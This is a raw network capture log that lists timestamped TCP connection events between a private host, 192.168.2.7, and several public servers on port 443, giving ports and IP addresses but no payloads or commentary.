Nov 9, 2024 02:47:18.811963081 CET	49724	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.811983109 CET	443	49724	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.811997890 CET	49724	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.812002897 CET	443	49724	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.817456007 CET	49732	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.817486048 CET	443	49732	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.817543983 CET	49732	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.817913055 CET	49732	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.817925930 CET	443	49732	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.828636885 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:18.828701019 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:18.832662106 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:18.832673073 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:18.832945108 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:18.883898020 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:18.895428896 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:18.943334103 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:19.087030888 CET	49677	443	192.168.2.7	20.50.201.200
Nov 9, 2024 02:47:19.137279987 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:19.137584925 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:19.137600899 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:19.137643099 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:19.137720108 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:19.137767076 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:19.137890100 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:19.169405937 CET	49735	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:19.169423103 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:19.169717073 CET	49735	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:19.169740915 CET	49735	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:19.169744968 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:19.208031893 CET	443	49726	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.208741903 CET	49726	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.208756924 CET	443	49726	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.209067106 CET	49726	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.209074020 CET	443	49726	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.243179083 CET	443	49727	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.244019985 CET	49727	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.244020939 CET	49727	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.244035959 CET	443	49727	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.244048119 CET	443	49727	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.283226013 CET	443	49728	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.284079075 CET	49728	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.284079075 CET	49728	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.284092903 CET	443	49728	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.284101009 CET	443	49728	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.340751886 CET	443	49726	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.340825081 CET	443	49726	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.341085911 CET	49726	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.341141939 CET	49726	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.341141939 CET	49726	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.341165066 CET	443	49726	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.341170073 CET	443	49726	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.344116926 CET	49736	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.344152927 CET	443	49736	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.344245911 CET	49736	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.344361067 CET	49736	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.344374895 CET	443	49736	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.381884098 CET	443	49727	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.382036924 CET	443	49727	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.382167101 CET	49727	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.382167101 CET	49727	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.382260084 CET	49727	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.382272959 CET	443	49727	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.385080099 CET	49737	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.385116100 CET	443	49737	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.385188103 CET	49737	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.385317087 CET	49737	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.385329962 CET	443	49737	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.390844107 CET	443	49731	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.391877890 CET	49731	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.391877890 CET	49731	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.391913891 CET	443	49731	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.391928911 CET	443	49731	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.430296898 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.430901051 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.430922031 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.431963921 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.432090044 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.433370113 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.433432102 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.433630943 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.433639050 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.478037119 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.525870085 CET	443	49731	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.526000977 CET	443	49731	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.526134968 CET	49731	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.526134968 CET	49731	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.526174068 CET	49731	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.526192904 CET	443	49731	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.528728008 CET	49738	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.528755903 CET	443	49738	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.529004097 CET	49738	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.529109001 CET	49738	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.529117107 CET	443	49738	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.560008049 CET	443	49732	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.560942888 CET	49732	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.560942888 CET	49732	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.560965061 CET	443	49732	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.560976982 CET	443	49732	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.561786890 CET	443	49728	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.561923027 CET	443	49728	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.562242031 CET	49728	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.562242031 CET	49728	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.562340975 CET	49728	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.562351942 CET	443	49728	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.564713955 CET	49739	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.564753056 CET	443	49739	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.564908028 CET	49739	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.564996958 CET	49739	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.565012932 CET	443	49739	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.583832979 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:19.583849907 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:19.584053993 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:19.584273100 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:19.584279060 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:19.676477909 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.676537991 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.676573992 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.676606894 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.676645994 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.676680088 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.678495884 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.678509951 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.685163975 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.685478926 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.685487032 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.690607071 CET	443	49732	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.691188097 CET	443	49732	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.695291996 CET	49732	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.695291996 CET	49732	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.695475101 CET	49732	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.695487022 CET	443	49732	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.698745966 CET	49742	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.698780060 CET	443	49742	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.698925972 CET	49742	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.699093103 CET	49742	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:19.699111938 CET	443	49742	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:19.729723930 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.729732037 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.774611950 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.793210030 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.793339968 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.793808937 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.793828964 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.797528982 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.797600031 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.797606945 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.802128077 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.802222967 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.802229881 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.812119007 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.812355995 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.812362909 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.819648027 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.820008993 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.820014954 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.828138113 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.828619003 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.828629017 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.837044001 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.837655067 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.837673903 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.847358942 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.847652912 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.847666979 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.856065989 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.856364965 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.856376886 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.900038004 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.908004999 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.908071041 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.908196926 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.908232927 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.908241987 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.908277035 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.908314943 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.908327103 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.909099102 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.912679911 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.912929058 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.913080931 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.913088083 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.918483019 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.918541908 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.918603897 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.918612003 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.919099092 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.921848059 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.928606987 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.928643942 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.928684950 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.928702116 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.929362059 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.934775114 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.940707922 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.940741062 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.940793037 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.940808058 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.941257954 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.946929932 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.952950001 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.952994108 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.953016043 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.953025103 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.953587055 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.959243059 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.965112925 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.965152979 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.965313911 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.965325117 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.965552092 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.971435070 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.977642059 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.977705002 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.979595900 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.979614019 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.980034113 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.983477116 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.989568949 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.989618063 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.989700079 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.989712954 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:19.991274118 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:19.996663094 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.014799118 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:20.014944077 CET	49735	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:20.016092062 CET	49735	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:20.016108036 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:20.016377926 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:20.017548084 CET	49735	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:20.023793936 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.023869038 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.023912907 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.023947001 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.023979902 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.023997068 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.024096966 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.024130106 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.024158955 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.024162054 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.024169922 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.024221897 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.024221897 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.026156902 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.031174898 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.031220913 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.033303022 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.033313036 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.033543110 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.036813974 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.042515993 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.042546034 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.042579889 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.042589903 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.043103933 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.047926903 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.056015968 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.056071997 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.056344032 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.056354046 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.056438923 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.059078932 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.063333988 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:20.091789007 CET	443	49736	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.092953920 CET	49736	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.092953920 CET	49736	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.092968941 CET	443	49736	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.092982054 CET	443	49736	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.102741003 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.102754116 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.104662895 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.104738951 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.105041981 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:20.105130911 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.105130911 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:20.114979029 CET	443	49737	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.115566969 CET	49737	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.115598917 CET	443	49737	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.116278887 CET	49737	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.116291046 CET	443	49737	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.224741936 CET	443	49736	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.225007057 CET	443	49736	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.225198984 CET	49736	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.225198984 CET	49736	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.225256920 CET	49736	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.225269079 CET	443	49736	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.228771925 CET	49743	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.228840113 CET	443	49743	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.228924036 CET	49743	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.229062080 CET	49743	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.229079008 CET	443	49743	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.245273113 CET	443	49737	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.245332003 CET	443	49737	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.245492935 CET	49737	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.245527983 CET	49737	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.245527983 CET	49737	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.245546103 CET	443	49737	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.245556116 CET	443	49737	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.248058081 CET	49744	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.248080969 CET	443	49744	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.248152018 CET	49744	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.248286963 CET	49744	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.248300076 CET	443	49744	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.257703066 CET	443	49738	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.258088112 CET	49738	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.258097887 CET	443	49738	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.258532047 CET	49738	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.258536100 CET	443	49738	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.261970043 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:20.262031078 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:20.262860060 CET	49735	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:20.262883902 CET	49735	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:20.262897015 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:20.262908936 CET	49735	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:20.262914896 CET	443	49735	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:20.318218946 CET	443	49739	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.318743944 CET	49739	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.318758011 CET	443	49739	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.319206953 CET	49739	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.319212914 CET	443	49739	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.389745951 CET	443	49738	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.389915943 CET	443	49738	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.390228033 CET	49738	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.390228033 CET	49738	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.390228033 CET	49738	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.393521070 CET	49745	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.393553972 CET	443	49745	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.393812895 CET	49745	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.393812895 CET	49745	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.393840075 CET	443	49745	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.426116943 CET	443	49742	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.426603079 CET	49742	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.426630020 CET	443	49742	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.427109003 CET	49742	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.427114010 CET	443	49742	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.434828997 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.435138941 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:20.435149908 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.435533047 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.435600042 CET	49740	443	192.168.2.7	172.217.18.14
